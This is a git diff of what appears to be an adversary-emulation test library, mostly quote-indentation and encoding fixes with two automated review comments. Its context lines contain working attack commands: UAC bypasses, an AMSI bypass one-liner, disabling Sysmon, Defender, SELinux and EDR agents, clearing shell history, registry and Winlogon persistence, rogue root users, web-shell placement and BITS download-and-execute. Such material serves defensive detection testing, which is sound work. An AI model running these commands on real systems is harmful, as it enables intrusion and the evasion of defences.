diff --git a/atomics/T1121/T1121.md b/atomics/T1121/T1121.md index eab10287ba..78dd810120 100644 --- a/atomics/T1121/T1121.md +++ b/atomics/T1121/T1121.md @@ -28,7 +28,8 @@ Executes the Uninstall Method, No Admin Rights Required #### Attack Commands: Run with `command_prompt`! -``` + +```cmd C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /out:"#{output_file}" /target:library #{source_file} C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{output_file} ``` @@ -71,9 +72,10 @@ Executes the Uninstall Method, No Admin Rights Required, Requires SNK | source_file | Location of the CSharp source_file | Path | PathToAtomicsFolder\T1121\src\T1121.cs| - #### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) -``` + + +```powershell $key = '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' $Content = [System.Convert]::FromBase64String($key) Set-Content $env:Temp\key.snk -Value $Content -Encoding Byte diff --git a/atomics/T1158/T1158.md b/atomics/T1158/T1158.md index 3032337d8f..25b95819ab 100644 --- a/atomics/T1158/T1158.md +++ b/atomics/T1158/T1158.md @@ -242,7 +242,7 @@ Create an Alternate Data Stream with the command prompt. Write access is require ```cmd echo "Normal Text." > #{file_name} echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename} -for /f "usebackq delims=╧å" %i in (#{file_name}:#{ads_filename}) do %i +for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i ``` #### Cleanup Commands: diff --git a/atomics/index.yaml b/atomics/index.yaml index 5ba1ffc9a8..082a26bb86 100644 --- a/atomics/index.yaml +++ b/atomics/index.yaml @@ -62,7 +62,7 @@ persistence: - name: Add command to .bash_profile description: 'Adds a command to the .bash_profile file of the current user - ' +' supported_platforms: - macos - linux 
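Review bot: The added `'` at column 0 in the @@ -62,7 +62,7 @@ hunk of index.yaml closes a multi-line single-quoted `description:` scalar with a continuation line that is indented less than the mapping that owns it; the same pattern repeats in every other index.yaml hunk of this diff (through @@ -7518,25 +7518,25 @@). Lenient loaders (PyYAML, libyaml) accept this and the scalar value is unchanged, but a strict YAML 1.2 parser may reject a flow-scalar continuation line that is not indented past the parent block, so any consumer that validates index.yaml with a different library could start failing on this file. If the file is generated (which the uniform change suggests), the trailing newline is expressed more portably as a block scalar, e.g. `description: |` followed by `  Adds a command to the .bash_profile file of the current user`, which needs no continuation-line trick; otherwise keep the closing quote indented as it was.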
@@ -75,11 +75,11 @@ persistence: name: sh command: 'echo "#{command_to_add}" >> ~/.bash_profile - ' +' - name: Add command to .bashrc description: 'Adds a command to the .bashrc file of the current user - ' +' supported_platforms: - macos - linux @@ -92,7 +92,7 @@ persistence: name: sh command: 'echo "#{command_to_add}" >> ~/.bashrc - ' +' T1015: technique: x_mitre_permissions_required: @@ -170,7 +170,7 @@ persistence: description: 'Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables. - ' +' supported_platforms: - windows input_arguments: @@ -178,7 +178,7 @@ persistence: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" - ' +' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -186,7 +186,7 @@ persistence: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe - ' +' type: Path default: C:\windows\system32\cmd.exe executor: @@ -303,7 +303,7 @@ persistence: - name: Admin Account Manipulate description: 'Manipulate Admin Account Name - ' +' supported_platforms: - windows executor: @@ -522,7 +522,7 @@ persistence: description: 'AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system - ' +' supported_platforms: - windows input_arguments: @@ -535,7 +535,7 @@ persistence: elevation_required: true command: 'reg.exe import #{registry_file} - ' +' T1138: technique: x_mitre_data_sources: @@ -642,7 +642,7 @@ persistence: - name: New shim database files created in the default shim database directory description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - ' +' supported_platforms: - windows executor: 
@@ -657,7 +657,7 @@ persistence: - name: Registry key creation and/or modification events for SDB description: 'https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html - ' +' supported_platforms: - windows executor: @@ -772,10 +772,10 @@ persistence: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} - ' +' cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' - name: Download & Execute via PowerShell BITS description: | This test simulates an adversary leveraging bitsadmin.exe to download @@ -796,10 +796,10 @@ persistence: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} - ' +' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore - ' +' - name: Persist, Download, & Execute description: | This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer @@ -947,7 +947,7 @@ persistence: - name: Firefox description: 'Create a file called test.wma, with the duration of 30 seconds - ' +' supported_platforms: - linux - windows @@ -1033,7 +1033,7 @@ persistence: - name: Change Default File Association description: 'Change Default File Association From cmd.exe - ' +' supported_platforms: - windows input_arguments: @@ -1050,7 +1050,7 @@ persistence: elevation_required: false command: 'cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}" - ' +' T1136: technique: x_mitre_permissions_required: @@ -1123,7 +1123,7 @@ persistence: - name: Create a user account on a Linux system description: 'Create a user via useradd - ' +' supported_platforms: - linux input_arguments: @@ -1140,14 +1140,14 @@ persistence: elevation_required: true command: 'useradd -M -N -r -s /bin/bash -c evil_account #{username} - ' +' cleanup_command: 'userdel #{username} - ' +' - name: Create a user account on a MacOS system description: 'Creates a user on a MacOS system with dscl - ' +' supported_platforms: - macos input_arguments: 
@@ -1171,11 +1171,11 @@ persistence: dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username} cleanup_command: 'dscl . -delete /Users/#{username} - ' +' - name: Create a new user in a command prompt description: 'Creates a new user in a command prompt - ' +' supported_platforms: - windows input_arguments: @@ -1192,14 +1192,14 @@ persistence: elevation_required: true command: 'net user /add "#{username}" "#{password}" - ' +' cleanup_command: 'net user /del "#{username}" - ' +' - name: Create a new user in PowerShell description: 'Creates a new user in PowerShell - ' +' supported_platforms: - windows input_arguments: @@ -1212,15 +1212,15 @@ persistence: elevation_required: true command: 'New-LocalUser -Name "#{username}" -NoPassword - ' +' cleanup_command: 'Remove-LocalUser -Name "#{username}" -ErrorAction Ignore - ' +' - name: Create a new user in Linux with `root` UID and GID. description: 'Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. - ' +' supported_platforms: - linux input_arguments: @@ -1411,7 +1411,7 @@ persistence: description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 - ' +' supported_platforms: - macos input_arguments: @@ -1583,7 +1583,7 @@ persistence: - name: Create a hidden file in a hidden directory description: 'Creates a hidden file inside a hidden directory - ' +' supported_platforms: - linux - macos @@ -1595,11 +1595,11 @@ persistence: echo "T1158" > /var/tmp/.hidden-directory/.hidden-file cleanup_command: 'rm -rf /var/tmp/.hidden-directory/ - ' +' - name: Mac Hidden file description: 'Hide a file on MacOS - ' +' supported_platforms: - macos executor: 
@@ -1608,12 +1608,12 @@ persistence: command: 'xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00" - ' +' - name: Create Windows System File with Attrib description: 'Creates a file and marks it as a system file using the attrib.exe utility. - ' +' supported_platforms: - windows executor: @@ -1624,11 +1624,11 @@ persistence: attrib.exe +s %TEMP%\T1158.txt cleanup_command: 'del /A:S %TEMP%\T1158.txt >nul 2>&1 - ' +' - name: Create Windows Hidden File with Attrib description: 'Creates a file and marks it as hidden using the attrib.exe utility. - ' +' supported_platforms: - windows executor: @@ -1639,11 +1639,11 @@ persistence: attrib.exe +h %TEMP%\T1158_hidden.txt cleanup_command: 'del /A:H %TEMP%\T1158_hidden.txt >nul 2>&1 - ' +' - name: Hidden files description: 'Requires Apple Dev Tools - ' +' supported_platforms: - macos input_arguments: @@ -1656,11 +1656,11 @@ persistence: elevation_required: false command: 'setfile -a V #(unknown) - ' +' - name: Hide a Directory description: 'Hide a directory on MacOS - ' +' supported_platforms: - macos executor: @@ -1671,11 +1671,11 @@ persistence: chflags hidden /var/tmp/T1158_mac.txt cleanup_command: 'rm /var/tmp/T1158_mac.txt - ' +' - name: Show all hidden files description: 'Show all hidden files on MacOS - ' +' supported_platforms: - macos executor: @@ -1683,15 +1683,15 @@ persistence: elevation_required: false command: 'defaults write com.apple.finder AppleShowAllFiles YES - ' +' cleanup_command: 'defaults write com.apple.finder AppleShowAllFiles NO - ' +' - name: Create ADS command prompt description: 'Create an Alternate Data Stream with the command prompt. Write access is required. - ' +' supported_platforms: - windows input_arguments: 
@@ -1709,15 +1709,15 @@ persistence: command: | echo "Normal Text." > #{file_name} echo cmd /c echo "Shell code execution."> #{file_name}:#{ads_filename} - for /f "usebackq delims=╧å" %i in (#{file_name}:#{ads_filename}) do %i + for /f "usebackq delims=φ" %i in (#{file_name}:#{ads_filename}) do %i cleanup_command: 'del #{file_name} >nul 2>&1 - ' +' - name: Create ADS PowerShell description: 'Create an Alternate Data Stream with PowerShell. Write access is required. - ' +' supported_platforms: - windows input_arguments: @@ -1739,7 +1739,7 @@ persistence: ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore - ' +' T1179: technique: x_mitre_data_sources: @@ -1869,7 +1869,7 @@ persistence: - name: Hook PowerShell TLS Encrypt/Decrypt Messages description: 'Hooks functions in PowerShell to read TLS Communications - ' +' supported_platforms: - windows input_arguments: @@ -2067,7 +2067,7 @@ persistence: - name: IFEO Add Debugger description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -2085,15 +2085,15 @@ persistence: command: 'REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" - ' +' cleanup_command: 'reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f - ' +' - name: IFEO Global Flags description: 'Leverage Global Flags Settings - ' +' supported_platforms: - windows input_arguments: @@ -2221,7 +2221,7 @@ persistence: description: 'This test uses the insmod command to load a kernel module for Linux. - ' +' supported_platforms: - linux input_arguments: @@ -2238,10 +2238,10 @@ persistence: elevation_required: true command: 'insmod #{kernel_module_file} - ' +' cleanup_command: 'rmmod #{module_name} - ' +' T1159: technique: x_mitre_permissions_required: 
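Review bot: The new `delims=φ` in the `for /f` line of @@ -1709,15 +1709,15 @@ (and the matching line in the T1158.md hunk) is the correct decoding of what `╧å` was, the UTF-8 bytes of `φ` read as CP437, but the fix still depends on the file staying UTF-8 and on cmd.exe receiving the argument in a matching code page; if either changes, the delimiter is mangled again and the line is tokenized at an unintended character, so the test silently runs something other than the stored stream line. Since the only purpose of the delimiter is to pick a character that never occurs in the stream content so the whole line lands in `%i`, an ASCII character that cannot appear in the echoed text would remove the encoding dependency entirely. At minimum the dependency should be recorded next to the command, e.g. `# delims is a non-ASCII char chosen so the whole stream line is one token; this file must remain UTF-8`.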
@@ -2326,7 +2326,7 @@ persistence: - name: Launch Agent description: 'Create a plist and execute it - ' +' supported_platforms: - macos executor: @@ -2428,7 +2428,7 @@ persistence: - name: Launch Daemon description: 'Utilize LaunchDaemon to launch `Hello World` - ' +' supported_platforms: - macos executor: @@ -2512,14 +2512,14 @@ persistence: - name: Launchctl description: 'Utilize launchctl - ' +' supported_platforms: - macos executor: name: sh command: 'launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator - ' +' T1168: technique: x_mitre_data_sources: @@ -2607,7 +2607,7 @@ persistence: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. - ' +' supported_platforms: - macos - linux @@ -2624,13 +2624,13 @@ persistence: name: bash command: 'echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} - ' +' - name: Cron - Add script to cron folder description: 'This test adds a script to a cron folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - macos - linux @@ -2647,7 +2647,7 @@ persistence: name: bash command: 'echo "#{command}" > /etc/cron.daily/#{cron_script_name} - ' +' - name: Event Monitor Daemon Persistence description: "This test adds persistence via a plist to execute via the macOS Event Monitor Daemon. \n" @@ -2752,7 +2752,7 @@ persistence: description: 'Adds a registry value to run batch script created in the C:\Windows\Temp directory. - ' +' supported_platforms: - windows input_arguments: @@ -2777,7 +2777,7 @@ persistence: - name: Scheduled Task Startup Script description: 'Run an exe on user logon or system startup - ' +' supported_platforms: - windows executor: @@ -2792,7 +2792,7 @@ persistence: - name: Logon Scripts - Mac description: 'Mac logon script - ' +' supported_platforms: - macos executor: 
@@ -2808,7 +2808,7 @@ persistence: description: 'vbs files can be placed in and ran from the startup folder to maintain persistance - ' +' supported_platforms: - windows executor: @@ -2826,7 +2826,7 @@ persistence: description: 'jse files can be placed in and ran from the startup folder to maintain persistance - ' +' supported_platforms: - windows executor: @@ -2844,7 +2844,7 @@ persistence: description: 'bat files can be placed in and ran from the startup folder to maintain persistance - ' +' supported_platforms: - windows executor: @@ -3001,7 +3001,7 @@ persistence: description: 'Netsh interacts with other operating system components using dynamic-link library (DLL) files - ' +' supported_platforms: - windows input_arguments: @@ -3013,7 +3013,7 @@ persistence: name: command_prompt command: 'netsh.exe add helper #{helper_file} - ' +' T1050: technique: x_mitre_permissions_required: @@ -3089,7 +3089,7 @@ persistence: - name: Service Installation description: 'Installs A Local Service - ' +' supported_platforms: - windows input_arguments: @@ -3120,7 +3120,7 @@ persistence: - name: Service Installation PowerShell Installs A Local Service using PowerShell description: 'Installs A Local Service via PowerShell - ' +' supported_platforms: - windows input_arguments: @@ -3424,7 +3424,7 @@ persistence: - name: Plist Modification description: 'Modify MacOS plist file in one of two directories - ' +' supported_platforms: - macos executor: @@ -3517,7 +3517,7 @@ persistence: description: 'Appends a start process cmdlet to the current user''s powershell profile pofile that points to a malicious executable - ' +' supported_platforms: - windows input_arguments: @@ -3598,7 +3598,7 @@ persistence: command: 'echo osascript -e ''tell app "Finder" to display dialog "Hello World"'' >> /etc/rc.common - ' +' T1164: technique: x_mitre_permissions_required: 
@@ -3767,7 +3767,7 @@ persistence: - name: Reg Key Run description: 'Run Key Persistence - ' +' supported_platforms: - windows input_arguments: @@ -3780,15 +3780,15 @@ persistence: command: 'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}" - ' +' cleanup_command: 'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f - ' +' - name: Reg Key RunOnce description: 'RunOnce Key Persistence - ' +' supported_platforms: - windows input_arguments: @@ -3801,15 +3801,15 @@ persistence: command: 'REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}" - ' +' cleanup_command: 'REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f - ' +' - name: PowerShell Registry RunOnce description: 'RunOnce Key Persistence via PowerShell - ' +' supported_platforms: - windows input_arguments: @@ -3830,7 +3830,7 @@ persistence: cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun" -Force -ErrorAction Ignore - ' +' T1053: technique: x_mitre_permissions_required: @@ -3933,7 +3933,7 @@ persistence: elevation_required: false command: 'at 13:20 /interactive cmd - ' +' - name: Scheduled task Local description: '' supported_platforms: @@ -3952,14 +3952,14 @@ persistence: elevation_required: true command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /TN spawn /F - ' +' - name: Scheduled task Remote description: 'Create a task on a remote system - ' +' supported_platforms: - windows input_arguments: 
@@ -3989,10 +3989,10 @@ persistence: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /TN "Atomic task" /F - ' +' - name: Powershell Cmdlet Scheduled Task description: | Create an atomic scheduled task that leverages native powershell cmdlets. @@ -4012,7 +4012,7 @@ persistence: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 - ' +' T1180: technique: x_mitre_data_sources: @@ -4075,7 +4075,7 @@ persistence: sets it as the screensaver so it will execute for persistence. Requires a reboot and logon. - ' +' supported_platforms: - windows input_arguments: @@ -4416,7 +4416,7 @@ persistence: description: 'Make, change owner, and change file attributes on a C source code file - ' +' supported_platforms: - macos - linux @@ -4442,7 +4442,7 @@ persistence: - name: Set a SetUID flag on file description: 'This test sets the SetUID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -4460,11 +4460,11 @@ persistence: sudo chmod u+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' - name: Set a SetGID flag on file description: 'This test sets the SetGID flag on a file in Linux and macOS. - ' +' supported_platforms: - macos - linux @@ -4482,7 +4482,7 @@ persistence: sudo chmod g+s #{file_to_setuid} cleanup_command: 'sudo rm #{file_to_setuid} - ' +' T1023: technique: x_mitre_permissions_required: @@ -4548,11 +4548,11 @@ persistence: command: 'echo [InternetShortcut] > test.url && echo URL=C:\windows\system32\calc.exe >> #{shortcut_file_path} && #{shortcut_file_path} >nul 2>&1 - ' +' - name: Create shortcut to cmd in startup folders description: 'LNK file to launch CMD placed in startup folder - ' +' supported_platforms: - windows executor: 
@@ -4648,10 +4648,10 @@ persistence: elevation_required: true command: 'sudo touch /Library/StartupItems/EvilStartup.plist - ' +' cleanup_command: 'sudo rm /Library/StartupItems/EvilStartup.plist - ' +' T1501: technique: x_mitre_data_sources: @@ -4750,7 +4750,7 @@ persistence: description: 'This test creates a Systemd service unit file and enables it as a service. - ' +' supported_platforms: - linux input_arguments: @@ -4966,10 +4966,10 @@ persistence: name: command_prompt command: 'xcopy #{web_shells} #{web_shell_path} - ' +' cleanup_command: 'del #{web_shell_path} >nul 2>&1 - ' +' T1084: technique: x_mitre_permissions_required: @@ -5138,7 +5138,7 @@ persistence: description: 'PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe. - ' +' supported_platforms: - windows input_arguments: @@ -5152,16 +5152,16 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Shell" -Force -ErrorAction Ignore - ' +' - name: Winlogon Userinit Key Persistence - PowerShell description: 'PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe. - ' +' supported_platforms: - windows input_arguments: @@ -5175,16 +5175,16 @@ persistence: command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force - ' +' cleanup_command: 'Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" -Name "Userinit" -Force -ErrorAction Ignore - ' +' - name: Winlogon Notify Key Logon Persistence - PowerShell description: 'PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon. - ' +' supported_platforms: - windows input_arguments: 
@@ -5201,7 +5201,7 @@ persistence: cleanup_command: 'Remove-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force -ErrorAction Ignore - ' +' defense-evasion: T1134: technique: @@ -5516,10 +5516,10 @@ defense-evasion: command: 'bitsadmin.exe /transfer /Download /priority Foreground #{remote_file} #{local_file} - ' +' cleanup_command: 'del #{local_file} >nul 2>&1 - ' +' - name: Download & Execute via PowerShell BITS description: | This test simulates an adversary leveraging bitsadmin.exe to download @@ -5540,10 +5540,10 @@ defense-evasion: command: 'Start-BitsTransfer -Priority foreground -Source #{remote_file} -Destination #{local_file} - ' +' cleanup_command: 'Remove-Item #{local_file} -ErrorAction Ignore - ' +' - name: Persist, Download, & Execute description: | This test simulates an adversary leveraging bitsadmin.exe to schedule a BITS transfer @@ -5639,7 +5639,7 @@ defense-evasion: - name: Pad Binary to Change Hash - Linux/macOS dd description: 'Uses dd to add a zero to the binary to change the hash - ' +' supported_platforms: - macos - linux @@ -5653,7 +5653,7 @@ defense-evasion: elevation_required: false command: 'dd if=/dev/zero bs=1 count=1 >> #{file_to_pad} - ' +' T1088: technique: x_mitre_data_sources: @@ -5755,7 +5755,7 @@ defense-evasion: description: 'Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - ' +' supported_platforms: - windows input_arguments: 
@@ -5770,12 +5770,12 @@ defense-evasion: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f - ' +' - name: Bypass UAC using Event Viewer - PowerShell description: 'PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/ - ' +' supported_platforms: - windows input_arguments: @@ -5792,12 +5792,12 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore - ' +' - name: Bypass UAC using Fodhelper description: 'Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. - ' +' supported_platforms: - windows input_arguments: @@ -5814,12 +5814,12 @@ defense-evasion: fodhelper.exe cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f - ' +' - name: Bypass UAC using Fodhelper - PowerShell description: 'PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10. - ' +' supported_platforms: - windows input_arguments: @@ -5838,12 +5838,12 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' - name: Bypass UAC using ComputerDefaults - PowerShell description: 'PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10 - ' +' supported_platforms: - windows input_arguments: 
@@ -5862,13 +5862,13 @@ defense-evasion: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' - name: Bypass UAC by Mocking Trusted Directories description: 'Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems, however the directory structure will be created. - ' +' supported_platforms: - windows input_arguments: @@ -5964,7 +5964,7 @@ defense-evasion: description: 'Adversaries may supply CMSTP.exe with INF files infected with malicious commands - ' +' supported_platforms: - windows input_arguments: @@ -5984,12 +5984,12 @@ defense-evasion: elevation_required: false command: 'cmstp.exe /s #{inf_file_path} - ' +' - name: CMSTP Executing UAC Bypass description: 'Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file - ' +' supported_platforms: - windows input_arguments: @@ -6009,7 +6009,7 @@ defense-evasion: elevation_required: false command: 'cmstp.exe /s #{inf_file_uac} /au - ' +' T1146: technique: x_mitre_data_sources: @@ -6062,7 +6062,7 @@ defense-evasion: - name: Clear Bash history (rm) description: 'Clears bash history via rm - ' +' supported_platforms: - linux - macos @@ -6070,11 +6070,11 @@ defense-evasion: name: sh command: 'rm ~/.bash_history - ' +' - name: Clear Bash history (echo) description: 'Clears bash history via rm - ' +' supported_platforms: - linux - macos @@ -6082,11 +6082,11 @@ defense-evasion: name: sh command: 'echo "" > ~/.bash_history - ' +' - name: Clear Bash history (cat dev/null) description: 'Clears bash history via cat /dev/null - ' +' supported_platforms: - linux - macos @@ -6094,11 +6094,11 @@ defense-evasion: name: sh command: 'cat /dev/null > ~/.bash_history - ' +' - name: Clear Bash history (ln dev/null) description: 'Clears bash history via a symlink to /dev/null - ' +' supported_platforms: - linux - macos 
@@ -6106,23 +6106,23 @@ defense-evasion: name: sh command: 'ln -sf /dev/null ~/.bash_history - ' +' - name: Clear Bash history (truncate) description: 'Clears bash history via truncate - ' +' supported_platforms: - linux executor: name: sh command: 'truncate -s0 ~/.bash_history - ' +' - name: Clear history of a bunch of shells description: 'Clears the history of a bunch of different shell types by setting the history size to zero - ' +' supported_platforms: - linux - macos @@ -6220,7 +6220,7 @@ defense-evasion: command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file} - ' +' cleanup_command: 'del #{output_file} >nul 2>&1' T1223: technique: @@ -6289,7 +6289,7 @@ defense-evasion: - name: Compiled HTML Help Local Payload description: 'Uses hh.exe to execute a local compiled HTML Help payload. - ' +' supported_platforms: - windows input_arguments: @@ -6309,11 +6309,11 @@ defense-evasion: elevation_required: false command: 'hh.exe #{local_chm_file} - ' +' - name: Compiled HTML Help Remote Payload description: 'Uses hh.exe to execute a remote compiled HTML Help payload. - ' +' supported_platforms: - windows input_arguments: @@ -6326,7 +6326,7 @@ defense-evasion: elevation_required: false command: 'hh.exe #{remote_chm_file} - ' +' T1090: technique: x_mitre_data_sources: @@ -6404,7 +6404,7 @@ defense-evasion: name: sh command: 'export #{proxy_scheme}_proxy=#{proxy_server} - ' +' cleanup_command: | unset http_proxy unset https_proxy @@ -6514,7 +6514,7 @@ defense-evasion: description: 'This test simulates an adversary leveraging control.exe to execute a payload and pops calc - ' +' supported_platforms: - windows input_arguments: @@ -6534,7 +6534,7 @@ defense-evasion: elevation_required: false command: 'control.exe #{cpl_file_path} - ' +' T1207: technique: x_mitre_data_sources: 
@@ -6791,7 +6791,7 @@ defense-evasion: updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded - ' +' supported_platforms: - windows input_arguments: @@ -6868,7 +6868,7 @@ defense-evasion: - name: Deobfuscate/Decode Files Or Information description: 'Encode/Decode executable - ' +' supported_platforms: - windows input_arguments: @@ -6889,7 +6889,7 @@ defense-evasion: description: 'Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) - ' +' supported_platforms: - windows input_arguments: @@ -6958,7 +6958,7 @@ defense-evasion: - name: Disable iptables firewall description: 'Disables the iptables firewall - ' +' supported_platforms: - linux executor: @@ -6977,7 +6977,7 @@ defense-evasion: - name: Disable syslog description: 'Disables syslog collection - ' +' supported_platforms: - linux executor: @@ -6994,7 +6994,7 @@ defense-evasion: - name: Disable Cb Response description: 'Disable the Cb Response service - ' +' supported_platforms: - linux executor: 
@@ -7011,52 +7011,52 @@ defense-evasion: - name: Disable SELinux description: 'Disables SELinux enforcement - ' +' supported_platforms: - linux executor: name: sh command: 'setenforce 0 - ' +' - name: Disable Carbon Black Response description: 'Disables Carbon Black Response - ' +' supported_platforms: - macos executor: name: sh command: 'sudo launchctl unload /Library/LaunchDaemons/com.carbonblack.daemon.plist - ' +' - name: Disable LittleSnitch description: 'Disables LittleSnitch - ' +' supported_platforms: - macos executor: name: sh command: 'sudo launchctl unload /Library/LaunchDaemons/at.obdev.littlesnitchd.plist - ' +' - name: Disable OpenDNS Umbrella description: 'Disables OpenDNS Umbrella - ' +' supported_platforms: - macos executor: name: sh command: 'sudo launchctl unload /Library/LaunchDaemons/com.opendns.osx.RoamingClientConfigUpdater.plist - ' +' - name: Unload Sysmon Filter Driver description: 'Unloads the Sysinternals Sysmon filter driver without stopping the Sysmon service. - ' +' supported_platforms: - windows input_arguments: @@ -7075,10 +7075,10 @@ defense-evasion: elevation_required: true prereq_command: 'fltmc.exe filters | findstr #{sysmon_driver} - ' +' command: 'fltmc.exe unload #{sysmon_driver} - ' +' cleanup_command: | sc stop sysmon fltmc.exe load #{sysmon_driver} @@ -7099,19 +7099,19 @@ defense-evasion: prereq_command: 'if(Test-Path C:\Windows\System32\inetsrv\appcmd.exe) {exit 0} else {exit 1} - ' +' command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:true - ' +' cleanup_command: 'C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false - ' +' - name: Uninstall Sysmon description: 'Uninstall Sysinternals Sysmon for Defense Evasion - ' +' supported_platforms: - windows input_arguments: 
@@ -7138,10 +7138,10 @@ defense-evasion: elevation_required: true command: 'sysmon -u - ' +' cleanup_command: 'sysmon -i -accepteula - ' +' - name: AMSI Bypass - AMSI InitFailed description: | Any easy way to bypass AMSI inspection is it patch the dll in memory setting the "amsiInitFailed" function to true. @@ -7165,16 +7165,16 @@ defense-evasion: command: 'Remove-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}" -Recurse - ' +' cleanup_command: 'New-Item -Path "HKLM:\SOFTWARE\Microsoft\AMSI\Providers" -Name "{2781761E-28E0-4109-99FE-B9D127C57AFE}" - ' +' - name: Disable Arbitrary Security Windows Service description: 'With administrative rights, an adversary can disable Windows Services related to security products. - ' +' supported_platforms: - windows input_arguments: @@ -7223,12 +7223,12 @@ defense-evasion: elevation_required: false command: '[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField(''amsiInitFailed'',''NonPublic,Static'').SetValue($null,$true) - ' +' - name: Tamper with Windows Defender ATP PowerShell description: 'Attempting to disable scheduled scanning and other parts of windows defender atp - ' +' supported_platforms: - windows executor: @@ -7248,7 